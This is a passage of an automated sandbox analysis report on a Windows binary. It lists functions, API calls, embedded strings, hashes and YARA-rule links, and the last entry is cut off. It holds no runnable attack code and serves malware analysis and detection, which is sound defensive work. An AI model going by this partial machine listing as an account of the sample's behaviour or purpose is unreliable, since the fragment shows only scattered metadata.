                                                                                                                                                        • Opcode ID: bca4a39e2e001cfc64acc6e97e14394fbea34cc49215cca7be5584164e4eaa36
                                                                                                                                                        • Instruction ID: dcd0b85d79f4f4984b6184ccc1433d7b3066cf5f68bb6e69b449550d3a2f35db
                                                                                                                                                        • Opcode Fuzzy Hash: bca4a39e2e001cfc64acc6e97e14394fbea34cc49215cca7be5584164e4eaa36
                                                                                                                                                        • Instruction Fuzzy Hash: 9121C570A80209AEEB10DBD0CC57FAEBB78FB10714F500519F502B61C1EB796B48C665
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 006A2367, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 37COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,0069CF1E,?,00000004), ref: 006A23BA
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InfoLocale
                                                                                                                                                        • String ID: )K7~$0A$GetLocaleInfoEx
                                                                                                                                                        • API String ID: 2299586839-3530237769
                                                                                                                                                        • Opcode ID: bcd22071bb8084683528e91b2843fa29f242d9cdbec6f3de86e92d838b28ba30
                                                                                                                                                        • Instruction ID: 1800289c5027e3997701ac4d85fb3e1f56dd9fa0852bfb9707f4b2726bcfdc32
                                                                                                                                                        • Opcode Fuzzy Hash: bcd22071bb8084683528e91b2843fa29f242d9cdbec6f3de86e92d838b28ba30
                                                                                                                                                        • Instruction Fuzzy Hash: FAF0BB71A82218BBCF017F64DC16FAE7F67EF06B50F500119FC055A291DA755E20DB98
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0058E501, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 0040F655: InitializeCriticalSectionEx.KERNEL32(00791710,00000000,00000000,007916FC,0058E530,?,?,?,0040F227), ref: 0040F65B
                                                                                                                                                          • Part of subcall function 0040F655: GetLastError.KERNEL32(?,?,?,0040F227), ref: 0040F665
                                                                                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,0040F227), ref: 0058E534
                                                                                                                                                        • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0040F227), ref: 0058E543
                                                                                                                                                        Strings
                                                                                                                                                        • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0058E53E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
                                                                                                                                                        • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                        • API String ID: 3511171328-631824599
                                                                                                                                                        • Opcode ID: 258b51d3eaf69fada8bb27887d8afa14e30d0cf02f3c67afc6e50e55519f4161
                                                                                                                                                        • Instruction ID: ead5b1c1752c72ef2320934cdd29c0559b7575ba36b96943b909a42a403fbfed
                                                                                                                                                        • Opcode Fuzzy Hash: 258b51d3eaf69fada8bb27887d8afa14e30d0cf02f3c67afc6e50e55519f4161
                                                                                                                                                        • Instruction Fuzzy Hash: 15E06D706007828FC360AF29E8093567BF5AF0470CF04892EE886E6B50EBB5E5498B91
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 006A1DE7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00697ACB: RtlEnterCriticalSection.NTDLL(?), ref: 00697ADA
                                                                                                                                                        • EnumSystemLocalesW.KERNEL32(006A1DA1,00000001,0077A9B8,0000000C), ref: 006A1E1F
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                        • String ID: )K7~
                                                                                                                                                        • API String ID: 1272433827-2802557318
                                                                                                                                                        • Opcode ID: 28e6c5f266b6028cbd5cf40e75b8c43c29552971de90a0649542a63aea280da5
                                                                                                                                                        • Instruction ID: 4a409040a632d8d193a1bad0b7debff55d17e95e56e8c41d96b79f55bdd760ae
                                                                                                                                                        • Opcode Fuzzy Hash: 28e6c5f266b6028cbd5cf40e75b8c43c29552971de90a0649542a63aea280da5
                                                                                                                                                        • Instruction Fuzzy Hash: 0DF04F72A50200AFDB40FF68D806B4D77F2BB05720F10C11EF514DB2A2DB7989418F49
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00426F7A, Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • FindFirstFileExW.KERNEL32(?,00000000,00000220,00000000,00000000,00000000,?,00000000,74B5FA50,00426F1B,?,?,00000000,00000000,?,00000000), ref: 00426F92
                                                                                                                                                        • GetLastError.KERNEL32(?,00000000,74B5FA50,00426F1B,?,?,00000000,00000000,?,00000000,00000000,00000000), ref: 00426FB7
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorFileFindFirstLast
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 873889042-0
                                                                                                                                                        • Opcode ID: 605aca7427b15fef47dd0f66ac59e5b99a97b8085837f499191c6aece445a078
                                                                                                                                                        • Instruction ID: 81ad3060012dd1f7dbe57361802896eebfa2762599788e673d316f753473c9ca
                                                                                                                                                        • Opcode Fuzzy Hash: 605aca7427b15fef47dd0f66ac59e5b99a97b8085837f499191c6aece445a078
                                                                                                                                                        • Instruction Fuzzy Hash: 8FF059B2308320AAD7300A75BCC8FA73659EB80324F63092FF25BC61D0C774AC429279
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00689D67, Relevance: 2.7, Strings: 2, Instructions: 194COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: )K7~$i^
                                                                                                                                                        • API String ID: 0-3113788440
                                                                                                                                                        • Opcode ID: 4cbf6341890e360b3a56d559ee06a610e8d28739f687145d920bfee4967a73a5
                                                                                                                                                        • Instruction ID: 50f0bc3e426e726aba149a77137d50d1e2df2efe7114461253f4d1a7bfdad0fa
                                                                                                                                                        • Opcode Fuzzy Hash: 4cbf6341890e360b3a56d559ee06a610e8d28739f687145d920bfee4967a73a5
                                                                                                                                                        • Instruction Fuzzy Hash: 785169716407086AEB38FA688859BFB67ABDF41704F1C070EFA82DB380D6159C42C739
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 006940D0, Relevance: 2.1, Strings: 1, Instructions: 848COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: pow
                                                                                                                                                        • API String ID: 0-2276729525
                                                                                                                                                        • Opcode ID: 78a5a63bce204622aeb116d6b89e6d06f0560fd3fa864e09a3930502e5307870
                                                                                                                                                        • Instruction ID: e4e488de246d7ab1f220b4799d509e112fd243b98eae9ed3c0c5a834f4ea60d1
                                                                                                                                                        • Opcode Fuzzy Hash: 78a5a63bce204622aeb116d6b89e6d06f0560fd3fa864e09a3930502e5307870
                                                                                                                                                        • Instruction Fuzzy Hash: 87524621D29F414DDB23A638D822375669AAFB33C4F15C727F816B5AE9EB38C8C34504
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 006AAEC2, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 006A0BBE: GetLastError.KERNEL32(?,?,0068BA4F,0077A468,00000010), ref: 006A0BC2
                                                                                                                                                          • Part of subcall function 006A0BBE: _free.LIBCMT ref: 006A0BF5
                                                                                                                                                          • Part of subcall function 006A0BBE: SetLastError.KERNEL32(00000000), ref: 006A0C36
                                                                                                                                                          • Part of subcall function 006A0BBE: _abort.LIBCMT ref: 006A0C3C
                                                                                                                                                        • EnumSystemLocalesW.KERNEL32(006AAFEA,00000001,00000000,?,0069D4C0,?,006AB617,00000000,?,?,?), ref: 006AAF34
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1084509184-0
                                                                                                                                                        • Opcode ID: 71ca47289c0ac27835359785589f7fbafe327f60e4f296b7e9f132a0d2da153e
                                                                                                                                                        • Instruction ID: 7f125c7abdfc5edab2506efed1f1d56e02cbb1cc6ea7a6665962690f46c838b8
                                                                                                                                                        • Opcode Fuzzy Hash: 71ca47289c0ac27835359785589f7fbafe327f60e4f296b7e9f132a0d2da153e
                                                                                                                                                        • Instruction Fuzzy Hash: 871155362003054FDB28BF78C8A15BAB7A3FF81358B04842EE98787B40E371AC42CB40
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 006AAF5D, Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 006A0BBE: GetLastError.KERNEL32(?,?,0068BA4F,0077A468,00000010), ref: 006A0BC2
                                                                                                                                                          • Part of subcall function 006A0BBE: _free.LIBCMT ref: 006A0BF5
                                                                                                                                                          • Part of subcall function 006A0BBE: SetLastError.KERNEL32(00000000), ref: 006A0C36
                                                                                                                                                          • Part of subcall function 006A0BBE: _abort.LIBCMT ref: 006A0C3C
                                                                                                                                                        • EnumSystemLocalesW.KERNEL32(006AB23A,00000001,00000002,?,0069D4C0,?,006AB5DB,0069D4C0,?,?,?,?,?,0069D4C0,?,?), ref: 006AAFA9
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1084509184-0
                                                                                                                                                        • Opcode ID: 0de328637a9cc2d70c7338f88d5d372f6e9c6fb758d4ca72f7fea7fdec0551c4
                                                                                                                                                        • Instruction ID: 5c49915d129eaf3d4e85595363748559806722c7de62b75db3a4705a2db045c9
                                                                                                                                                        • Opcode Fuzzy Hash: 0de328637a9cc2d70c7338f88d5d372f6e9c6fb758d4ca72f7fea7fdec0551c4
                                                                                                                                                        • Instruction Fuzzy Hash: CEF022722003045FDB286FB99C81ABABB92EF82368B05802EF9458B741D7B19C02CA40
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 006AAE77, Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 006A0BBE: GetLastError.KERNEL32(?,?,0068BA4F,0077A468,00000010), ref: 006A0BC2
                                                                                                                                                          • Part of subcall function 006A0BBE: _free.LIBCMT ref: 006A0BF5
                                                                                                                                                          • Part of subcall function 006A0BBE: SetLastError.KERNEL32(00000000), ref: 006A0C36
                                                                                                                                                          • Part of subcall function 006A0BBE: _abort.LIBCMT ref: 006A0C3C
                                                                                                                                                        • EnumSystemLocalesW.KERNEL32(006AADCE,00000001,00000002,?,?,006AB639,0069D4C0,?,?,?,?,?,0069D4C0,?,?,?), ref: 006AAEAE
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1084509184-0
                                                                                                                                                        • Opcode ID: 40544a98f87a08b0bbdec0abcf1d12b2766503f106aee5df81b32a4c83be30f4
                                                                                                                                                        • Instruction ID: 7334fc1f527ee69f44d087e96fea237c66636e239d919596c40795990edd423d
                                                                                                                                                        • Opcode Fuzzy Hash: 40544a98f87a08b0bbdec0abcf1d12b2766503f106aee5df81b32a4c83be30f4
                                                                                                                                                        • Instruction Fuzzy Hash: 0AF0553630020557CB14BF79C8456AABF92EFC2714B07405AEA0A8B751CB719C42CB90
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0040EA7D, Relevance: .1, Instructions: 97COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 38ea03e12312cbb099f93ec693dce9b2c2bb26ea3fcdf849024c3aeda9b258aa
                                                                                                                                                        • Instruction ID: aa66d05171d9be8f527e265eac2fac4879e302e5f11ec8087246490d3ace24fd
                                                                                                                                                        • Opcode Fuzzy Hash: 38ea03e12312cbb099f93ec693dce9b2c2bb26ea3fcdf849024c3aeda9b258aa
                                                                                                                                                        • Instruction Fuzzy Hash: 8531E273A392858FC30DCB6D5C812A5BB74FB76210B14866BE845E72C2D2349516C7A4
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 006849A0, Relevance: .1, Instructions: 76COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                        • Instruction ID: 6784f72623077f7191d98b4d376d31aeeeab331e01df1919d5edd06e25d9e8f5
                                                                                                                                                        • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                        • Instruction Fuzzy Hash: F6112E7724108343DA38DA2DC4F46F7D797EBD532072D43BAD0824FB58DD6299459704
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0051E426, Relevance: 63.1, APIs: 1, Strings: 35, Instructions: 111COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __swprintf.LEGACY_STDIO_DEFINITIONS ref: 0051E547
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __swprintf
                                                                                                                                                        • String ID: Assertion failed$Autotrace call$Backtrace$Bad argument$Bad flag (parameter or structure field)$Bad number of channels$Bad parameter of type CvPoint$Bad type of mask argument$Division by zero occured$Formats of input arguments do not match$Gpu API call$Image step is wrong$Incorrect size of input array$Inplace operation is not supported$Input COI is not supported$Input image depth is not supported by function$Insufficient memory$Internal error$Iterations do not converge$Memory block has been corrupted$No Error$No GPU support$No OpenGL support$Null pointer$One of arguments' values is out of range$OpenGL API call$Parsing error$Requested object was not found$Sizes of input arguments do not match$The function/feature is not implemented$Unknown %s code %d$Unspecified error$Unsupported format or combination of formats$error$status
                                                                                                                                                        • API String ID: 1857805200-1549692122
                                                                                                                                                        • Opcode ID: e63df873889a26c5ab6202e68b6e2e20048a607ede884b5ae6ca508cb2c05d8f
                                                                                                                                                        • Instruction ID: c887efe71252e1a851ed1a5e2bb630bde46a2e5805497e3eea38c33d8b61171f
                                                                                                                                                        • Opcode Fuzzy Hash: e63df873889a26c5ab6202e68b6e2e20048a607ede884b5ae6ca508cb2c05d8f
                                                                                                                                                        • Instruction Fuzzy Hash: AD21C469740815537F2CD23C18565AC1891FB96328FED03F9BA2AC3FE3E25DDE862146
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00408A96, Relevance: 29.9, APIs: 7, Strings: 10, Instructions: 160COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 00408A9B
                                                                                                                                                        • _strlen.LIBCMT ref: 00408AC3
                                                                                                                                                          • Part of subcall function 004F20E3: __EH_prolog.LIBCMT ref: 004F20E8
                                                                                                                                                          • Part of subcall function 004F20E3: std::exception::exception.LIBCONCRT ref: 004F2111
                                                                                                                                                          • Part of subcall function 004F20E3: __CxxThrowException@8.LIBVCRUNTIME ref: 004F2130
                                                                                                                                                          • Part of subcall function 00411D9C: std::_Deallocate.LIBCONCRT ref: 00411DCC
                                                                                                                                                        • _strlen.LIBCMT ref: 00408B0D
                                                                                                                                                        • _strlen.LIBCMT ref: 00408B54
                                                                                                                                                        • _strlen.LIBCMT ref: 00408B9B
                                                                                                                                                        • _strlen.LIBCMT ref: 00408BE5
                                                                                                                                                        • _strlen.LIBCMT ref: 00408C44
                                                                                                                                                          • Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _strlen$H_prolog$DeallocateException@8Throw__onexitstd::_std::exception::exception
                                                                                                                                                        • String ID: (dy$10E527FADE682D1D$54FF53A5F1D36F1C$@dy$A09E667F3BCC908B$B05688C2B3E6C1FD$B67AE8584CAA73B2$C6EF372FE94F82BE$Xdy$pdy
                                                                                                                                                        • API String ID: 1318688329-1966961204
                                                                                                                                                        • Opcode ID: 1ceaa8edf2e29775682428bab6c5e95b357fb71840ee0e2a575927638e563363
                                                                                                                                                        • Instruction ID: 310caf5f3ddbba371bdccb2e27657faa00d2e05893bf7d58bd52ca9c81ff3696
                                                                                                                                                        • Opcode Fuzzy Hash: 1ceaa8edf2e29775682428bab6c5e95b357fb71840ee0e2a575927638e563363
                                                                                                                                                        • Instruction Fuzzy Hash: FA519371C052589EDB50EBA9D941BEDBBB4EF55300F2081AEE508F7242EB781E44CB69
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0040CE45, Relevance: 29.9, APIs: 7, Strings: 10, Instructions: 160COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 0040CE4A
                                                                                                                                                        • _strlen.LIBCMT ref: 0040CE72
                                                                                                                                                          • Part of subcall function 004F20E3: __EH_prolog.LIBCMT ref: 004F20E8
                                                                                                                                                          • Part of subcall function 004F20E3: std::exception::exception.LIBCONCRT ref: 004F2111
                                                                                                                                                          • Part of subcall function 004F20E3: __CxxThrowException@8.LIBVCRUNTIME ref: 004F2130
                                                                                                                                                          • Part of subcall function 00411D9C: std::_Deallocate.LIBCONCRT ref: 00411DCC
                                                                                                                                                        • _strlen.LIBCMT ref: 0040CEBC
                                                                                                                                                        • _strlen.LIBCMT ref: 0040CF03
                                                                                                                                                        • _strlen.LIBCMT ref: 0040CF4A
                                                                                                                                                        • _strlen.LIBCMT ref: 0040CF94
                                                                                                                                                        • _strlen.LIBCMT ref: 0040CFF3
                                                                                                                                                          • Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _strlen$H_prolog$DeallocateException@8Throw__onexitstd::_std::exception::exception
                                                                                                                                                        • String ID: py$10E527FADE682D1D$54FF53A5F1D36F1C$8py$A09E667F3BCC908B$B05688C2B3E6C1FD$B67AE8584CAA73B2$C6EF372FE94F82BE$Ppy$hpy
                                                                                                                                                        • API String ID: 1318688329-3349199139
                                                                                                                                                        • Opcode ID: 55845a6ef19fdb6ebc32c45c9a6a79081f3573d624f3e8bc4ffe30efa2bcb3d1
                                                                                                                                                        • Instruction ID: f839367711f615799f5e0509e18bd12e6726a05653990ba8fbeab15e2869408d
                                                                                                                                                        • Opcode Fuzzy Hash: 55845a6ef19fdb6ebc32c45c9a6a79081f3573d624f3e8bc4ffe30efa2bcb3d1
                                                                                                                                                        • Instruction Fuzzy Hash: 98519571C052589EDB54EBA9D941BEDBBB4EF45300F1081AEE508F7242EB781E44CB69
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00401CFE, Relevance: 29.9, APIs: 7, Strings: 10, Instructions: 160COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 00401D03
                                                                                                                                                        • _strlen.LIBCMT ref: 00401D2B
                                                                                                                                                          • Part of subcall function 004F20E3: __EH_prolog.LIBCMT ref: 004F20E8
                                                                                                                                                          • Part of subcall function 004F20E3: std::exception::exception.LIBCONCRT ref: 004F2111
                                                                                                                                                          • Part of subcall function 004F20E3: __CxxThrowException@8.LIBVCRUNTIME ref: 004F2130
                                                                                                                                                          • Part of subcall function 00411D9C: std::_Deallocate.LIBCONCRT ref: 00411DCC
                                                                                                                                                        • _strlen.LIBCMT ref: 00401D75
                                                                                                                                                        • _strlen.LIBCMT ref: 00401DBC
                                                                                                                                                        • _strlen.LIBCMT ref: 00401E03
                                                                                                                                                        • _strlen.LIBCMT ref: 00401E4D
                                                                                                                                                        • _strlen.LIBCMT ref: 00401EAC
                                                                                                                                                          • Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _strlen$H_prolog$DeallocateException@8Throw__onexitstd::_std::exception::exception
                                                                                                                                                        • String ID: (Wy$10E527FADE682D1D$54FF53A5F1D36F1C$@Wy$A09E667F3BCC908B$B05688C2B3E6C1FD$B67AE8584CAA73B2$C6EF372FE94F82BE$XWy$pWy
                                                                                                                                                        • API String ID: 1318688329-1109900027
                                                                                                                                                        • Opcode ID: f51136d8a38c1b4937ca1846972dc8994797f9b6c54f869152d5cbe84ce77016
                                                                                                                                                        • Instruction ID: ea970fe2a051cab5de8e5937a1900e0fcfe18c7d1ca3956626325157ff5f2455
                                                                                                                                                        • Opcode Fuzzy Hash: f51136d8a38c1b4937ca1846972dc8994797f9b6c54f869152d5cbe84ce77016
                                                                                                                                                        • Instruction Fuzzy Hash: 18516071C05258DEDB50EBA9D941BEDBBB4EF55300F2081AEE508F7242EB781E44CB69
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00404416, Relevance: 28.2, APIs: 7, Strings: 9, Instructions: 160COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 0040441B
                                                                                                                                                        • _strlen.LIBCMT ref: 00404443
                                                                                                                                                          • Part of subcall function 004F20E3: __EH_prolog.LIBCMT ref: 004F20E8
                                                                                                                                                          • Part of subcall function 004F20E3: std::exception::exception.LIBCONCRT ref: 004F2111
                                                                                                                                                          • Part of subcall function 004F20E3: __CxxThrowException@8.LIBVCRUNTIME ref: 004F2130
                                                                                                                                                          • Part of subcall function 00411D9C: std::_Deallocate.LIBCONCRT ref: 00411DCC
                                                                                                                                                        • _strlen.LIBCMT ref: 0040448D
                                                                                                                                                        • _strlen.LIBCMT ref: 004044D4
                                                                                                                                                        • _strlen.LIBCMT ref: 0040451B
                                                                                                                                                        • _strlen.LIBCMT ref: 00404565
                                                                                                                                                        • _strlen.LIBCMT ref: 004045C4
                                                                                                                                                          • Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _strlen$H_prolog$DeallocateException@8Throw__onexitstd::_std::exception::exception
                                                                                                                                                        • String ID: 10E527FADE682D1D$54FF53A5F1D36F1C$A09E667F3BCC908B$B05688C2B3E6C1FD$B67AE8584CAA73B2$C6EF372FE94F82BE$H_y$`_y$x_y
